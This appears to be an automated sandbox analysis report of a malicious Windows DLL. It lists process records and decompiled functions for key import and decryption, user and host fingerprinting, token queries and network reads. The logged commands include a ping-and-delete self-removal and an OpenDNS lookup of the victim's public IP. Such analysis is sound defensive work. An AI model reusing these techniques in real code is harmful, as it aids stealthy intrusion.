                                    Start time:15:28:17
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                                    Imagebase:0x7ff6a6590000
                                    File size:273920 bytes
                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:38
                                    Start time:15:28:18
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7bab80000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:39
                                    Start time:15:28:19
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping localhost -n 5
                                    Imagebase:0x7ff7ec300000
                                    File size:21504 bytes
                                    MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:41
                                    Start time:15:28:31
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                    Imagebase:0x7ff669e20000
                                    File size:99272 bytes
                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:42
                                    Start time:15:29:06
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1"
                                    Imagebase:
                                    File size:273920 bytes
                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language


                                      Execution Graph

                                      Execution Coverage:19.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:6
                                      Total number of Limit Nodes:0
                                      [Execution graph (rendered figure): node 401700 calls GetNLSVersion and flows to 401731; node 401750 flows to 401764, which branches to 401843 (GetBinaryTypeW) and to 40177c; 401843 then flows to 40177c.]

                                      Callgraph

                                      Control-flow Graph

                                      [Control-flow graph (rendered figure, legend: executed / not executed) of the function at 401750: the entry block 401750-401769 calls 401078; block 40177a-40186f calls GetBinaryTypeW; block 4018a5-4018ac calls 4010a0; all paths converge on the exit block 4018b7-4018c1.]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.403924361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.403918849.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403939675.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403945219.000000000042D000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403950267.0000000000432000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403955458.0000000000435000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403962294.000000000043E000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403967711.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403994171.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403998828.0000000000482000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.404012102.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.404017277.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.404023087.0000000000498000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                      Similarity
                                      • API ID: BinaryType
                                      • String ID:
                                      • API String ID: 3726996659-0
                                      • Opcode ID: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                      • Instruction ID: 0eeef9b5ff0b6f189b2643ab8443012d5bbcf05fbf81118edcc849a7d612c21c
                                      • Opcode Fuzzy Hash: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                      • Instruction Fuzzy Hash: 5F310AB4D043188BDB24DF64C8847ADBBB0AF55304F6081FAD819672E1D3799AC6DB4A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Control-flow graph (rendered figure, legend: executed / not executed) of the function at 401700: block 401700-40172c calls GetNLSVersion; block 401731-401736 branches to 401747-40174e or to 401738, and both reach the exit block 40173f-401746.]
                                      C-Code - Quality: 37%
                                      			E00401700() {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr* _t13;
                                      
                                      				_t7 = _t13;
                                      				 *((intOrPtr*)(_t7 + 8)) = 0;
                                      				 *((intOrPtr*)(_t7 + 4)) = 0;
                                      				 *_t7 = 0;
                                      				_t9 =  *__imp__GetNLSVersion(); // executed
                                      				_v12 = _t9;
                                      				if(GetLastError() != 0x57) {
                                      					_v8 = 1;
                                      				} else {
                                      					_v8 = 0;
                                      				}
                                      				return _v8;
                                      			}


                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.403924361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.403918849.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403939675.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403945219.000000000042D000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403950267.0000000000432000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403955458.0000000000435000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403962294.000000000043E000.00000020.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403967711.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403994171.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.403998828.0000000000482000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.404012102.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.404017277.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.404023087.0000000000498000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                      • Instruction ID: 3cf9f2388d101d325097f471fc7551e32da9b99bb7f36ef05aa09be99d1535a1
                                      • Opcode Fuzzy Hash: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                      • Instruction Fuzzy Hash: 14E04FB0914204DFDB00EFA8D95975E7BF0AB00308F1580F9D8085B3A1D379DE54EB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 58%
                                      			E04DE3072(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                      				int _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				BYTE* _v20;
                                      				long* _v24;
                                      				void* _v39;
                                      				char _v40;
                                      				void _v56;
                                      				int _v60;
                                      				intOrPtr _v64;
                                      				void _v67;
                                      				char _v68;
                                      				void* _t61;
                                      				int _t68;
                                      				signed int _t76;
                                      				int _t79;
                                      				int _t81;
                                      				int _t85;
                                      				long _t86;
                                      				int _t90;
                                      				signed int _t94;
                                      				int _t101;
                                      				BYTE* _t102;
                                      				int _t103;
                                      				void* _t104;
                                      				void* _t105;
                                      				void* _t106;
                                      
                                      				_t103 = __eax;
                                      				_t94 = 6;
                                      				_v68 = 0;
                                      				memset( &_v67, 0, _t94 << 2);
                                      				_t105 = _t104 + 0xc;
                                      				asm("stosw");
                                      				asm("stosb");
                                      				_v40 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosw");
                                      				asm("stosb");
                                      				_t61 =  *0x4dea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                      				if(_t61 == 0) {
                                      					_a8 = GetLastError();
                                      				} else {
                                      					_t101 = 0x10;
                                      					memcpy( &_v56, _a8, _t101);
                                      					_t106 = _t105 + 0xc;
                                      					_v60 = _t101;
                                      					_v67 = 2;
                                      					_v64 = 0x660e;
                                      					_v68 = 8;
                                      					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                      					if(_t68 == 0) {
                                      						_a8 = GetLastError();
                                      					} else {
                                      						_push(0);
                                      						_push( &_v40);
                                      						_push(1);
                                      						_push(_v12);
                                      						if( *0x4dea0e4() == 0) {
                                      							_a8 = GetLastError();
                                      						} else {
                                      							_t18 = _t103 + 0xf; // 0x11f
                                      							_t76 = _t18 & 0xfffffff0;
                                      							if(_a4 != 0 && _t76 == _t103) {
                                      								_t76 = _t76 + _t101;
                                      							}
                                      							_t102 = E04DE4DF6(_t76);
                                      							_v20 = _t102;
                                      							if(_t102 == 0) {
                                      								_a8 = 8;
                                      							} else {
                                      								_v16 = 0;
                                      								_a8 = 0;
                                      								while(1) {
                                      									_t79 = 0x10;
                                      									_v8 = _t79;
                                      									if(_t103 <= _t79) {
                                      										_v8 = _t103;
                                      									}
                                      									memcpy(_t102, _a12, _v8);
                                      									_t81 = _v8;
                                      									_a12 = _a12 + _t81;
                                      									_t103 = _t103 - _t81;
                                      									_t106 = _t106 + 0xc;
                                      									if(_a4 == 0) {
                                      										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                      									} else {
                                      										_t85 =  *0x4dea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                      									}
                                      									if(_t85 == 0) {
                                      										break;
                                      									}
                                      									_t90 = _v8;
                                      									_v16 = _v16 + _t90;
                                      									_t102 =  &(_t102[_t90]);
                                      									if(_t103 != 0) {
                                      										continue;
                                      									} else {
                                      										L17:
                                      										 *_a16 = _v20;
                                      										 *_a20 = _v16;
                                      									}
                                      									goto L21;
                                      								}
                                      								_t86 = GetLastError();
                                      								_a8 = _t86;
                                      								if(_t86 != 0) {
                                      									E04DE4C73(_v20);
                                      								} else {
                                      									goto L17;
                                      								}
                                      							}
                                      						}
                                      						L21:
                                      						CryptDestroyKey(_v12);
                                      					}
                                      					CryptReleaseContext(_v24, 0);
                                      				}
                                      				return _a8;
                                      			}

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04DE58B7), ref: 04DE30AA
                                      • memcpy.NTDLL(?,04DE58B7,00000010,?,?,?,?,?,?,?,?,?,?,04DE564C,00000000,04DE6D90), ref: 04DE30C3
                                      • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04DE30EC
                                      • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04DE3104
                                      • memcpy.NTDLL(00000000,04DE6D90,04DE58B7,0000011F), ref: 04DE3156
                                      • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04DE58B7,00000020,?,?,0000011F), ref: 04DE317F
                                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04DE58B7,?,?,0000011F), ref: 04DE3196
                                      • GetLastError.KERNEL32(?,?,0000011F), ref: 04DE31AE
                                      • GetLastError.KERNEL32 ref: 04DE31E0
                                      • CryptDestroyKey.ADVAPI32(?), ref: 04DE31EC
                                      • GetLastError.KERNEL32 ref: 04DE31F4
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04DE3201
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04DE564C,00000000,04DE6D90,04DE58B7,?,04DE58B7), ref: 04DE3209
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                      • String ID:
                                      • API String ID: 1967744295-0
                                      • Opcode ID: 5bb37f3fb022c7adaa62a17b087c796ec5b392180e5ba1d40496ad6ecf71deca
                                      • Instruction ID: 8d6c87b6899a22d18d8af61f374fdd54bb8b1b58fa4da99d65d2988fe1275973
                                      • Opcode Fuzzy Hash: 5bb37f3fb022c7adaa62a17b087c796ec5b392180e5ba1d40496ad6ecf71deca
                                      • Instruction Fuzzy Hash: 51511AB1A00209BFDB10AFA6DC84ABE7BB9FB44354F008429F915E7240D7769E54DB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 96%
                                      			E04DE12D3(char __eax, void* __esi) {
                                      				long _v8;
                                      				char _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v28;
                                      				long _t34;
                                      				signed int _t39;
                                      				long _t50;
                                      				char _t59;
                                      				intOrPtr _t61;
                                      				void* _t62;
                                      				void* _t64;
                                      				char _t65;
                                      				intOrPtr* _t67;
                                      				void* _t68;
                                      				void* _t69;
                                      
                                      				_t69 = __esi;
                                      				_t65 = __eax;
                                      				_v8 = 0;
                                      				_v12 = __eax;
                                      				if(__eax == 0) {
                                      					_t59 =  *0x4dea310; // 0xd448b889
                                      					_v12 = _t59;
                                      				}
                                      				_t64 = _t69;
                                      				E04DE333B( &_v12, _t64);
                                      				if(_t65 != 0) {
                                      					 *_t69 =  *_t69 ^  *0x4dea344 ^ 0x46d76429;
                                      				} else {
                                      					GetUserNameW(0,  &_v8); // executed
                                      					_t50 = _v8;
                                      					if(_t50 != 0) {
                                      						_t62 = RtlAllocateHeap( *0x4dea2d8, 0, _t50 + _t50);
                                      						if(_t62 != 0) {
                                      							if(GetUserNameW(_t62,  &_v8) != 0) {
                                      								_t64 = _t62;
                                      								 *_t69 =  *_t69 ^ E04DE2087(_v8 + _v8, _t64);
                                      							}
                                      							HeapFree( *0x4dea2d8, 0, _t62);
                                      						}
                                      					}
                                      				}
                                      				_t61 = __imp__;
                                      				_v8 = _v8 & 0x00000000;
                                      				GetComputerNameW(0,  &_v8);
                                      				_t34 = _v8;
                                      				if(_t34 != 0) {
                                      					_t68 = RtlAllocateHeap( *0x4dea2d8, 0, _t34 + _t34);
                                      					if(_t68 != 0) {
                                      						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                      							_t64 = _t68;
                                      							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04DE2087(_v8 + _v8, _t64);
                                      						}
                                      						HeapFree( *0x4dea2d8, 0, _t68);
                                      					}
                                      				}
                                      				asm("cpuid");
                                      				_t67 =  &_v28;
                                      				 *_t67 = 1;
                                      				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                      				 *((intOrPtr*)(_t67 + 8)) = 0;
                                      				 *(_t67 + 0xc) = _t64;
                                      				_t39 = _v16 ^ _v20 ^ _v28;
                                      				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                      				return _t39;
                                      			}

                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE130A
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE1321
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE132E
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE134F
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04DE1376
                                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04DE138A
                                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04DE1397
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE13B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: HeapName$AllocateComputerFreeUser
                                      • String ID: FNwPq
                                      • API String ID: 3239747167-3591455833
                                      • Opcode ID: bfd4474d0ce5100f998706ad66a4b2bbd32f298b5d7d91424d3ca48891f419c7
                                      • Instruction ID: 6488a2caa3e34e8ceec7580cc93690c4d557fd7a383a90002d75972b70f0debb
                                      • Opcode Fuzzy Hash: bfd4474d0ce5100f998706ad66a4b2bbd32f298b5d7d91424d3ca48891f419c7
                                      • Instruction Fuzzy Hash: 0431F7B1B00206AFDB10EFAADC91A6EB7F9FB48300F614469E545D6251EB34EE019A10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 74%
                                      			E04DE5410(intOrPtr __edx, void** _a4, void** _a8) {
                                      				intOrPtr _v8;
                                      				struct _FILETIME* _v12;
                                      				short _v56;
                                      				struct _FILETIME* _t12;
                                      				intOrPtr _t13;
                                      				void* _t17;
                                      				void* _t21;
                                      				intOrPtr _t27;
                                      				long _t28;
                                      				void* _t30;
                                      
                                      				_t27 = __edx;
                                      				_t12 =  &_v12;
                                      				GetSystemTimeAsFileTime(_t12);
                                      				_push(0x192);
                                      				_push(0x54d38000);
                                      				_push(_v8);
                                      				_push(_v12);
                                      				L04DE81C4();
                                      				_push(_t12);
                                      				_v12 = _t12;
                                      				_t13 =  *0x4dea348; // 0x6bd5a8
                                      				_t5 = _t13 + 0x4deb87e; // 0x54a8e26
                                      				_t6 = _t13 + 0x4deb59c; // 0x530025
                                      				_push(0x16);
                                      				_push( &_v56);
                                      				_v8 = _t27;
                                      				L04DE7E2A();
                                      				_t17 = CreateFileMappingW(0xffffffff, 0x4dea34c, 4, 0, 0x1000,  &_v56); // executed
                                      				_t30 = _t17;
                                      				if(_t30 == 0) {
                                      					_t28 = GetLastError();
                                      				} else {
                                      					if(GetLastError() == 0xb7) {
                                      						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                      						if(_t21 == 0) {
                                      							_t28 = GetLastError();
                                      							if(_t28 != 0) {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							 *_a4 = _t30;
                                      							 *_a8 = _t21;
                                      							_t28 = 0;
                                      						}
                                      					} else {
                                      						_t28 = 2;
                                      						L6:
                                      						CloseHandle(_t30);
                                      					}
                                      				}
                                      				return _t28;
                                      			}

                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53,?,?), ref: 04DE541C
                                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04DE5432
                                      • _snwprintf.NTDLL ref: 04DE5457
                                      • CreateFileMappingW.KERNELBASE(000000FF,04DEA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04DE5473
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53,?), ref: 04DE5485
                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04DE549C
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53), ref: 04DE54BD
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04DE2CE0,?,?,4D283A53,?), ref: 04DE54C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                      • String ID:
                                      • API String ID: 1814172918-0
                                      • Opcode ID: fcffb7a67ec2a276890e1ed901aac4126d7af9ad085852832f1551403064db69
                                      • Instruction ID: 5e51337da6b516d8d9965eb6ff9e0138ec9a993b968305ad65831aca441b55ae
                                      • Opcode Fuzzy Hash: fcffb7a67ec2a276890e1ed901aac4126d7af9ad085852832f1551403064db69
                                      • Instruction Fuzzy Hash: 7A21D5B2701214BBD711FBA6EC25FAE37B9EB84755F104061F609EB280E670EA04CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 38%
                                      			E04DE4695(char _a4, void* _a8) {
                                      				void* _v8;
                                      				void* _v12;
                                      				char _v16;
                                      				void* _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				void* _v44;
                                      				void** _t33;
                                      				void* _t40;
                                      				void* _t43;
                                      				void** _t44;
                                      				intOrPtr* _t47;
                                      				char _t48;
                                      
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v20 = _a4;
                                      				_t48 = 0;
                                      				_v16 = 0;
                                      				_a4 = 0;
                                      				_v44 = 0x18;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v36 = 0;
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                      					_t33 =  &_v8;
                                      					__imp__(_v12, 8, _t33);
                                      					if(_t33 >= 0) {
                                      						_t47 = __imp__;
                                      						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                      						_t44 = E04DE4DF6(_a4);
                                      						if(_t44 != 0) {
                                      							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                      							if(_t40 >= 0) {
                                      								memcpy(_a8,  *_t44, 0x1c);
                                      								_t48 = 1;
                                      							}
                                      							E04DE4C73(_t44);
                                      						}
                                      						NtClose(_v8); // executed
                                      					}
                                      					NtClose(_v12);
                                      				}
                                      				return _t48;
                                      			}

                                      APIs
                                      • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04DE46DC
                                      • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04DE46EF
                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04DE470B
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04DE4728
                                      • memcpy.NTDLL(?,00000000,0000001C), ref: 04DE4735
                                      • NtClose.NTDLL(?), ref: 04DE4747
                                      • NtClose.NTDLL(00000000), ref: 04DE4751
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                      • String ID:
                                      • API String ID: 2575439697-0
                                      • Opcode ID: 71f63fa01f3f8e128916c94887f14af8342a3a3ac3af2b2c02bdc45d43c2c9e6
                                      • Instruction ID: cdeb6a8eb7ef41afa199c399b7d57847404564cb91b389279ab698d5135b5cbe
                                      • Opcode Fuzzy Hash: 71f63fa01f3f8e128916c94887f14af8342a3a3ac3af2b2c02bdc45d43c2c9e6
                                      • Instruction Fuzzy Hash: 3C21E9B1A00228BBDF01AF96CC459EEBFBDEF48750F104056F905EA210D7759A459BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 70%
                                      			E04DE4CC6(void* __eax, void* __ecx) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void _v20;
                                      				void* __esi;
                                      				void* _t36;
                                      				intOrPtr* _t37;
                                      				intOrPtr* _t39;
                                      				int _t43;
                                      				long _t45;
                                      				void* _t53;
                                      				long _t58;
                                      				void* _t59;
                                      
                                      				_t53 = __ecx;
                                      				_t59 = __eax;
                                      				_t58 = 0;
                                      				ResetEvent( *(__eax + 0x1c));
                                      				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                      					L5:
                                      					if(_v8 == 0) {
                                      						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                      						L21:
                                      						return _t58;
                                      					}
                                      					 *0x4dea174(0, 1,  &_v12); // executed
                                      					if(0 != 0) {
                                      						_t58 = 8;
                                      						goto L21;
                                      					}
                                      					_t36 = E04DE4DF6(0x1000);
                                      					_v16 = _t36;
                                      					if(_t36 == 0) {
                                      						_t58 = 8;
                                      						L18:
                                      						_t37 = _v12;
                                      						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                      						goto L21;
                                      					}
                                      					_push(0);
                                      					_push(_v8);
                                      					_push( &_v20);
                                      					while(1) {
                                      						_t39 = _v12;
                                      						_t56 =  *_t39;
                                      						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                      						ResetEvent( *(_t59 + 0x1c));
                                      						_t43 = InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8); // executed
                                      						if(_t43 != 0) {
                                      							goto L13;
                                      						}
                                      						_t58 = GetLastError();
                                      						if(_t58 != 0x3e5) {
                                      							L15:
                                      							E04DE4C73(_v16);
                                      							if(_t58 == 0) {
                                      								_t45 = E04DE56EC(_v12, _t59); // executed
                                      								_t58 = _t45;
                                      							}
                                      							goto L18;
                                      						}
                                      						_t58 = E04DE3A6F( *(_t59 + 0x1c), _t56, 0xffffffff);
                                      						if(_t58 != 0) {
                                      							goto L15;
                                      						}
                                      						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                      						if(_t58 != 0) {
                                      							goto L15;
                                      						}
                                      						L13:
                                      						_t58 = 0;
                                      						if(_v8 == 0) {
                                      							goto L15;
                                      						}
                                      						_push(0);
                                      						_push(_v8);
                                      						_push(_v16);
                                      					}
                                      				}
                                      				_t58 = GetLastError();
                                      				if(_t58 != 0x3e5) {
                                      					L4:
                                      					if(_t58 != 0) {
                                      						goto L21;
                                      					}
                                      					goto L5;
                                      				}
                                      				_t58 = E04DE3A6F( *(_t59 + 0x1c), _t53, 0xffffffff);
                                      				if(_t58 != 0) {
                                      					goto L21;
                                      				}
                                      				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                      				goto L4;
                                      			}

                                      APIs
                                      • ResetEvent.KERNEL32(?), ref: 04DE4CDC
                                      • InternetReadFile.WININET(?,?,00000004,?), ref: 04DE4CEB
                                      • GetLastError.KERNEL32 ref: 04DE4CF5
                                        • Part of subcall function 04DE3A6F: WaitForMultipleObjects.KERNEL32(00000002,04DE7B35,00000000,04DE7B35,?,?,?,04DE7B35,0000EA60), ref: 04DE3A8A
                                      • ResetEvent.KERNEL32(?), ref: 04DE4D6E
                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 04DE4D7F
                                      • GetLastError.KERNEL32 ref: 04DE4D89
                                      Memory Dump Source
